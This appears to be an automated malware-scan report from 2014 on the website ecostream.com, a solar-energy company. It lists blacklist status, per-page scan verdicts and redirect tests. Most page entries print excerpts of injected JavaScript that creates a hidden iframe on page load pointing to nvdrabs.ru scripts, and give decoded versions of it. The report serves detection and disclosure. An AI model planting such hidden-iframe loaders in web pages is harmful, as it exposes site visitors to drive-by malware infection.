Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecostream.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ecostream.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ecostream.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 23 May 2014 01:54:39 GMT Location: http://www.ecostream.com/ Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ecostream.com/ | 200 OK Content-Length: 8882 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function tacgmlz(){ create_frame("http://nvdrabs.ru/rjnemzv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', tacgmlz); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); tacgmlz(); }; window.onload = newonload; } else { window.onload = tacgmlz; } } } catch(err) {} Decoded script: function tacgmlz() { create_frame("http://nvdrabs.ru/rjnemzv.cgi?default"); } | ||
http://www.ecostream.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://ecostream.com/about-ecostream/about-ecostream/about-us | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 23 May 2014 01:54:41 GMT Location: http://www.ecostream.com/about-ecostream/about-ecostream/about-us Server: Apache/2.2.9 Vary: Accept-Encoding Content-Length: 273 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ecostream.com/about-ecostream/about-ecostream/about-us | 200 OK Content-Length: 9017 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nvdrabs.ru ...[10395 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 3zss4zt(){ create_frame("http://nvdrabs.ru/uvkkivr.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 3zss4zt); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 3zss4zt(); }; window.onload = newonload; } else { window.onload = 3zss4zt; } ...[54 bytes skipped]... | ||
http://www.ecostream.com/about-ecostream/products | 200 OK Content-Length: 8154 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function ww2ooa5(){ create_frame("http://nvdrabs.ru/ssyggjo.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', ww2ooa5); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); ww2ooa5(); }; window.onload = newonload; } else { window.onload = ww2ooa5; } } } catch(err) {} Decoded script: function ww2ooa5() { create_frame("http://nvdrabs.ru/ssyggjo.cgi?default"); } | ||
http://www.ecostream.com/about-ecostream/projects | 200 OK Content-Length: 8925 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function cxgndob(){ create_frame("http://nvdrabs.ru/nbeqlgw.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', cxgndob); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); cxgndob(); }; window.onload = newonload; } else { window.onload = cxgndob; } } } catch(err) {} Decoded script: function cxgndob() { create_frame("http://nvdrabs.ru/nbeqlgw.cgi?default"); } | ||
http://www.ecostream.com/about-ecostream/newsamedia | 200 OK Content-Length: 10061 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[304 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function bo1l25l(){ create_frame("http://nvdrabs.ru/wgtzyoz.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', bo1l25l); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); bo1l25l(); }; window.onload = newonload; } else { window.onload = bo1l25l; } } } catch(err) {} Decoded script: function bo1l25l() { create_frame("http://nvdrabs.ru/wgtzyoz.cgi?default"); } | ||
http://www.ecostream.com/contact- | 200 OK Content-Length: 10424 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[310 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function cdne4az(){ create_frame("http://nvdrabs.ru/nlqdijv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', cdne4az); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); cdne4az(); }; window.onload = newonload; } else { window.onload = cdne4az; } } } catch(err) {} Decoded script: function cdne4az() { create_frame("http://nvdrabs.ru/nlqdijv.cgi?default"); } | ||
http://www.ecostream.com/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/javascript | clean |
http://www.ecostream.com/sitemap | 200 OK Content-Length: 8346 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nvdrabs.ru ...[9548 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 4osmbje(){ create_frame("http://nvdrabs.ru/igkmwcd.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 4osmbje); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 4osmbje(); }; window.onload = newonload; } else { window.onload = 4osmbje; ...[55 bytes skipped]... | ||
http://www.ecostream.com/about-ecostream/about-ecostream/vision-mission-a-strategy | 200 OK Content-Length: 9042 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nvdrabs.ru ...[10298 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 4k5qc1x(){ create_frame("http://nvdrabs.ru/ixoantb.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 4k5qc1x); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 4k5qc1x(); }; window.onload = newonload; } else { window.onload = 4k5qc1x; } ...[54 bytes skipped]... | ||
http://www.ecostream.com/about-ecostream/home | 200 OK Content-Length: 8900 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[306 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function oeggwbj(){ create_frame("http://nvdrabs.ru/gdeeswc.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', oeggwbj); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); oeggwbj(); }; window.onload = newonload; } else { window.onload = oeggwbj; } } } catch(err) {} Decoded script: function oeggwbj() { create_frame("http://nvdrabs.ru/gdeeswc.cgi?default"); } | ||
http://www.ecostream.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.ecostream.com/about-ecostream/about-ecostream/countries | 200 OK Content-Length: 8628 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[310 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function ieeai2a(){ create_frame("http://nvdrabs.ru/hddjhyj.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', ieeai2a); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); ieeai2a(); }; window.onload = newonload; } else { window.onload = ieeai2a; } } } catch(err) {} Decoded script: function ieeai2a() { create_frame("http://nvdrabs.ru/hddjhyj.cgi?default"); } | ||
http://www.ecostream.com/about-ecostream/products/our-solar-partners | 200 OK Content-Length: 7984 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function lidtblz(){ create_frame("http://nvdrabs.ru/zhlrwzv.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', lidtblz); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); lidtblz(); }; window.onload = newonload; } else { window.onload = lidtblz; } } } catch(err) {} Decoded script: function lidtblz() { create_frame("http://nvdrabs.ru/zhlrwzv.cgi?default"); } | ||
http://www.ecostream.com/about-ecostream/products/solar-faq | 200 OK Content-Length: 30611 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[304 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function bb4eeib(){ create_frame("http://nvdrabs.ru/wwiddhw.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', bb4eeib); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); bb4eeib(); }; window.onload = newonload; } else { window.onload = bb4eeib; } } } catch(err) {} Decoded script: function bb4eeib() { create_frame("http://nvdrabs.ru/wwiddhw.cgi?default"); } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecostream.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 23 May 2014 01:54:39 GMT
Location: http://www.ecostream.com/
Server: Apache/2.2.9
Vary: Accept-Encoding
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
GET / HTTP/1.1
Host: ecostream.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 23 May 2014 01:54:39 GMT
Location: http://www.ecostream.com/
Server: Apache/2.2.9
Vary: Accept-Encoding
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecostream.com
Referer: http://www.google.com/search?q=ecostream.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecostream.com
Referer: http://www.google.com/search?q=ecostream.com
Result:
The result is similar to the first query. There are no suspicious redirects found.